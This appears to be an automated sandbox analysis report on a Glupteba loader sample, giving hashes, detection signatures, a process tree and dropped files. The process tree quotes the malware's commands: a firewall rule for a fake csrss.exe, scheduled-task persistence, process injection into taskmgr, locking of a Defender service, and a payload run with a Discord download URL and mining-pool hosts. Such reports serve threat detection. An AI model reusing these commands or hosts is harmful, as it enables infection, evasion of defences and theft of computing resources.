Analysis

  • max time kernel
    31s
  • max time network
    307s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    09/05/2024, 23:12

General

  • Target

    89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe

  • Size

    4.2MB

  • MD5

    d9bddd630d7adb9a53c28f80ca985c39

  • SHA1

    fdc88ce8d2422f9fb7748c9fb17189ffbc583a21

  • SHA256

    89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6

  • SHA512

    6598aaf11c728555503f4f385bc88b4a9eec195022b146a6a22ad77759bdb1d72bffb083c7c514222eb253183b2839778b9f688f7a17aa6e2d84797298c2abda

  • SSDEEP

    98304:oaQpezkUMTE1jG98FBE9/5ssyESeegfnf4lyOj6mN9jOyo0hkLNK:oJpe4BEU98Fs/etESKJ46WSVc

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 31 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • UPX packed file 19 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe
    "C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3268
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3460
    • C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe
      "C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe"
      2⤵
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2232
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2096
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1696
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2676
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
          PID:4420
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Command and Scripting Interpreter: PowerShell
            PID:1260
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:4588
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /delete /tn ScheduledUpdate /f
            4⤵
              PID:4652
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:5048
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:224
            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              4⤵
                PID:1040
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                4⤵
                • Creates scheduled task(s)
                PID:2276
              • C:\Windows\windefender.exe
                "C:\Windows\windefender.exe"
                4⤵
                  PID:3236
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                    5⤵
                      PID:4496
                      • C:\Windows\SysWOW64\sc.exe
                        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                        6⤵
                        • Launches sc.exe
                        PID:1972
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:868
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                    4⤵
                      PID:796
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:1892
                    • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
                      4⤵
                        PID:2688
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:964
                      • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                        C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
                        4⤵
                          PID:60
                  • C:\Windows\windefender.exe
                    C:\Windows\windefender.exe
                    1⤵
                      PID:2924

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uo1b4rti.qwb.ps1

                            Filesize

                            1B

                            MD5

                            c4ca4238a0b923820dcc509a6f75849b

                            SHA1

                            356a192b7913b04c54574d18c28d46e6395428ab

                            SHA256

                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                            SHA512

                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

                            Filesize

                            2.0MB

                            MD5

                            1bf850b4d9587c1017a75a47680584c4

                            SHA1

                            75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

                            SHA256

                            ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

                            SHA512

                            ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

                          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

                            Filesize

                            2.8MB

                            MD5

                            713674d5e968cbe2102394be0b2bae6f

                            SHA1

                            90ac9bd8e61b2815feb3599494883526665cb81e

                            SHA256

                            f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

                            SHA512

                            e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

                          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

                            Filesize

                            2.0MB

                            MD5

                            dcb505dc2b9d8aac05f4ca0727f5eadb

                            SHA1

                            4f633edb62de05f3d7c241c8bc19c1e0be7ced75

                            SHA256

                            61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

                            SHA512

                            31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                            Filesize

                            281KB

                            MD5

                            d98e33b66343e7c96158444127a117f6

                            SHA1

                            bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                            SHA256

                            5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                            SHA512

                            705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                            Filesize

                            2KB

                            MD5

                            db01a2c1c7e70b2b038edf8ad5ad9826

                            SHA1

                            540217c647a73bad8d8a79e3a0f3998b5abd199b

                            SHA256

                            413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                            SHA512

                            c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            f1e81bfa1717b123f894327081dc9e1c

                            SHA1

                            4919850074ac238faee65dbdf056ab5adea4a3dd

                            SHA256

                            df41f8eeeacaad826aec241e0e9f5ac2807ed305ccf43b25511e2f83c868eae5

                            SHA512

                            7c94076ff2a6fcc95004070ffe00aff8ece34fd67dc89b5c3694343baf3e306eee17bb955f9f18700deb128aecdb7f708626721041aa7813615cb6bd0aff0fa2

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            14854a6a6815b5fc8dcc9b2198c26433

                            SHA1

                            86dda7c8141779a8ee87980c58b7c29f3d687203

                            SHA256

                            dc8ea1e5ed0e86b60107ac5718f93e477c7e2c0b4ceff2e72a9ad79dfd65a0de

                            SHA512

                            eb95cc95f3713664dc26f5a4ee0a5a315c54633587aab9d216958c37c25cd304d6d7b1ffcff7c456fc2e7c5b3f3dfa8178b0d96a73bfee173fec7592db8774e5

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            fdaa510ecc2fe89fe23a3f392e8e0037

                            SHA1

                            69b25a8136f8a5946006e1c1d9d6b20502979d51

                            SHA256

                            4276b932950b48339b7cc7eaf02169f92032b63f2aa36b5f11edfc1bdbb3ce66

                            SHA512

                            10f26f1ff6775c285bf02a636c3c27880cafbbb28e9928d125d8f112b18d32dc9c620a3e7265e61c573116d96f597cf70ae6a0568df28347bca563974f11afec

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            efbb2eb59b592e313d26d2e8667f556a

                            SHA1

                            1d9f302096ba962dcb65f9180e29fbb818bdd915

                            SHA256

                            04f995160264f67da40371768bb38ac720f9ec88628f4c955fa0ed50af7eb02d

                            SHA512

                            e7872966a66d39340b2f9e8f07c12b8a11d4b9d96fba20ef2972210d1dae6623dff25fa67d4b8d255c0f3d180a8a25e14a217a54fd1dbe2d08a3d77172f51e78

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            a2fb1b3436615b5482f6ea1c2c7c99db

                            SHA1

                            0953588fff794dbe3766299c6c4e2b6edf630655

                            SHA256

                            f2df064f92aa5359288ce1eafe0af01d4d9a697c08185eaec9a7e0d382c0532e

                            SHA512

                            7735972af4566637f0065c368c0b7ca35512750f11882915aa19ccbd0feea7cfb3784e91a21a71cc93df79ecbc1695bb08c6b61120128948b43b6413dd277bd6

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            ebab4a9d0d313b37adeb042ccc3ca191

                            SHA1

                            f6b3bb226ea9da339e494dd46da1d47c16b4725a

                            SHA256

                            0f750f511a851aebdefbb909724e9aabc50cab1aa813f36aa6af35b7ba8edab6

                            SHA512

                            a08314e3dd0a4080a4ffb1a23a0f96a52451bcc6f06efdc7715e8d03d8908fcb45e7915de7b788b8fca7a7f9622dc6a9783b8dd85d401d51b5113bab30051283

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            a81946f1d4e18a427967d12137b9a455

                            SHA1

                            31e36ff820dcf2559cd951d9b49badea9529a439

                            SHA256

                            6fe55bed3f25b5279ea33d5c82f50fb7cfcb6edce5fa96b8a530ecef5541261d

                            SHA512

                            5210a5e4aac75456e3ee9ef360fa5f464a85d739a0092b912035ed8c2e77a7f942f70d1c849a240853401bf75d7d3a685e6b4a77ed23cc8c3030a03379065ce8

                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Filesize

                            18KB

                            MD5

                            1033c59969145835c9075c852bbd45a4

                            SHA1

                            dfdee2deafe7a7a2a9152f9ed56c58defceab7cd

                            SHA256

                            ff2f35b33e162fb5db782e5a09d7511f3a63db12e384a8900be9b1c2ecb7affe

                            SHA512

                            44e6d610cda9ee4c1e320454fd9a9756a4b903781e86b5ac90a0f7516edbd68e647768fc4c8c61fd7e9def220f2d79d01d873fbf5e722f9299e5f9edf68453ce

                          • C:\Windows\rss\csrss.exe

                            Filesize

                            4.2MB

                            MD5

                            d9bddd630d7adb9a53c28f80ca985c39

                            SHA1

                            fdc88ce8d2422f9fb7748c9fb17189ffbc583a21

                            SHA256

                            89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6

                            SHA512

                            6598aaf11c728555503f4f385bc88b4a9eec195022b146a6a22ad77759bdb1d72bffb083c7c514222eb253183b2839778b9f688f7a17aa6e2d84797298c2abda

                          • C:\Windows\windefender.exe

                            Filesize

                            2.0MB

                            MD5

                            8e67f58837092385dcf01e8a2b4f5783

                            SHA1

                            012c49cfd8c5d06795a6f67ea2baf2a082cf8625

                            SHA256

                            166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

                            SHA512

                            40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

                          • memory/60-2556-0x0000000000400000-0x00000000008E8000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/60-2552-0x0000000000400000-0x00000000008E8000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/60-2561-0x0000000000400000-0x00000000008E8000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/224-1539-0x0000000070450000-0x00000000707A0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/224-1538-0x0000000070400000-0x000000007044B000-memory.dmp

                            Filesize

                            300KB

                          • memory/796-2059-0x0000000000400000-0x00000000008E1000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/796-2062-0x0000000000400000-0x00000000008E1000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/868-1837-0x0000000070310000-0x000000007035B000-memory.dmp

                            Filesize

                            300KB

                          • memory/868-1838-0x0000000070360000-0x00000000706B0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/868-1814-0x0000000007480000-0x00000000077D0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/868-1818-0x00000000079A0000-0x00000000079EB000-memory.dmp

                            Filesize

                            300KB

                          • memory/868-1843-0x0000000008EB0000-0x0000000008F55000-memory.dmp

                            Filesize

                            660KB

                          • memory/964-2329-0x0000000070360000-0x00000000706B0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/964-2328-0x0000000070310000-0x000000007035B000-memory.dmp

                            Filesize

                            300KB

                          • memory/1260-1062-0x0000000009D10000-0x0000000009DB5000-memory.dmp

                            Filesize

                            660KB

                          • memory/1260-1057-0x0000000070520000-0x0000000070870000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1260-1056-0x00000000704B0000-0x00000000704FB000-memory.dmp

                            Filesize

                            300KB

                          • memory/1260-1037-0x0000000008C00000-0x0000000008C4B000-memory.dmp

                            Filesize

                            300KB

                          • memory/1260-1035-0x0000000008150000-0x00000000084A0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1696-570-0x0000000070550000-0x000000007059B000-memory.dmp

                            Filesize

                            300KB

                          • memory/1696-549-0x0000000007E20000-0x0000000008170000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1696-571-0x00000000705C0000-0x0000000070910000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1892-2085-0x0000000070360000-0x00000000706B0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/1892-2084-0x0000000070310000-0x000000007035B000-memory.dmp

                            Filesize

                            300KB

                          • memory/2232-332-0x0000000008E70000-0x0000000008F15000-memory.dmp

                            Filesize

                            660KB

                          • memory/2232-327-0x00000000705A0000-0x00000000708F0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/2232-326-0x0000000070550000-0x000000007059B000-memory.dmp

                            Filesize

                            300KB

                          • memory/2232-307-0x0000000007E40000-0x0000000007E8B000-memory.dmp

                            Filesize

                            300KB

                          • memory/2232-306-0x0000000007450000-0x00000000077A0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/2676-809-0x0000000070550000-0x000000007059B000-memory.dmp

                            Filesize

                            300KB

                          • memory/2676-810-0x00000000705A0000-0x00000000708F0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/2688-2306-0x00000000003E0000-0x0000000000CAD000-memory.dmp

                            Filesize

                            8.8MB

                          • memory/2688-2553-0x00000000003E0000-0x0000000000CAD000-memory.dmp

                            Filesize

                            8.8MB

                          • memory/2688-2558-0x00000000003E0000-0x0000000000CAD000-memory.dmp

                            Filesize

                            8.8MB

                          • memory/2688-2559-0x00000000003E0000-0x0000000000CAD000-memory.dmp

                            Filesize

                            8.8MB

                          • memory/2924-1769-0x0000000000400000-0x00000000008DF000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/2924-1773-0x0000000000400000-0x00000000008DF000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/2924-1777-0x0000000000400000-0x00000000008DF000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/2924-1783-0x0000000000400000-0x00000000008DF000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/3236-1770-0x0000000000400000-0x00000000008DF000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/3236-1767-0x0000000000400000-0x00000000008DF000-memory.dmp

                            Filesize

                            4.9MB

                          • memory/3268-302-0x0000000000400000-0x0000000000D1C000-memory.dmp

                            Filesize

                            9.1MB

                          • memory/3268-289-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/3268-2-0x0000000003EF0000-0x00000000047DB000-memory.dmp

                            Filesize

                            8.9MB

                          • memory/3268-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

                            Filesize

                            9.1MB

                          • memory/3268-301-0x0000000003EF0000-0x00000000047DB000-memory.dmp

                            Filesize

                            8.9MB

                          • memory/3268-1-0x0000000003AE0000-0x0000000003EE6000-memory.dmp

                            Filesize

                            4.0MB

                          • memory/3268-300-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/3460-10-0x00000000070E0000-0x0000000007102000-memory.dmp

                            Filesize

                            136KB

                          • memory/3460-299-0x0000000073720000-0x0000000073E0E000-memory.dmp

                            Filesize

                            6.9MB

                          • memory/3460-11-0x00000000077F0000-0x0000000007856000-memory.dmp

                            Filesize

                            408KB

                          • memory/3460-8-0x0000000073720000-0x0000000073E0E000-memory.dmp

                            Filesize

                            6.9MB

                          • memory/3460-12-0x0000000007940000-0x00000000079A6000-memory.dmp

                            Filesize

                            408KB

                          • memory/3460-7-0x00000000010B0000-0x00000000010E6000-memory.dmp

                            Filesize

                            216KB

                          • memory/3460-13-0x0000000007AB0000-0x0000000007E00000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/3460-14-0x0000000007E80000-0x0000000007E9C000-memory.dmp

                            Filesize

                            112KB

                          • memory/3460-4-0x000000007372E000-0x000000007372F000-memory.dmp

                            Filesize

                            4KB

                          • memory/3460-15-0x00000000083F0000-0x000000000843B000-memory.dmp

                            Filesize

                            300KB

                          • memory/3460-34-0x00000000082D0000-0x000000000830C000-memory.dmp

                            Filesize

                            240KB

                          • memory/3460-9-0x00000000071C0000-0x00000000077E8000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/3460-65-0x0000000009010000-0x0000000009086000-memory.dmp

                            Filesize

                            472KB

                          • memory/3460-73-0x0000000070430000-0x000000007047B000-memory.dmp

                            Filesize

                            300KB

                          • memory/3460-74-0x0000000070480000-0x00000000707D0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/3460-72-0x0000000009E10000-0x0000000009E43000-memory.dmp

                            Filesize

                            204KB

                          • memory/3460-75-0x0000000009DF0000-0x0000000009E0E000-memory.dmp

                            Filesize

                            120KB

                          • memory/3460-80-0x0000000073720000-0x0000000073E0E000-memory.dmp

                            Filesize

                            6.9MB

                          • memory/3460-81-0x0000000009E50000-0x0000000009EF5000-memory.dmp

                            Filesize

                            660KB

                          • memory/3460-82-0x000000000A070000-0x000000000A104000-memory.dmp

                            Filesize

                            592KB

                          • memory/3460-275-0x0000000009FD0000-0x0000000009FEA000-memory.dmp

                            Filesize

                            104KB

                          • memory/3460-280-0x0000000009FB0000-0x0000000009FB8000-memory.dmp

                            Filesize

                            32KB

                          • memory/4420-1778-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1780-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1806-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1808-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1810-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1802-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1800-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1798-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1816-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1796-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1794-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1792-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1790-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1788-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1786-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1784-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1782-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1804-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-2557-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1776-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1774-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1771-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1614-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-2538-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-2554-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4420-1762-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4500-1030-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/4500-565-0x0000000000400000-0x0000000001DFA000-memory.dmp

                            Filesize

                            26.0MB

                          • memory/5048-1277-0x00000000075F0000-0x0000000007940000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/5048-1279-0x0000000007D60000-0x0000000007DAB000-memory.dmp

                            Filesize

                            300KB

                          • memory/5048-1299-0x0000000070450000-0x00000000707A0000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/5048-1298-0x0000000070400000-0x000000007044B000-memory.dmp

                            Filesize

                            300KB

                          • memory/5048-1304-0x0000000009200000-0x00000000092A5000-memory.dmp

                            Filesize

                            660KB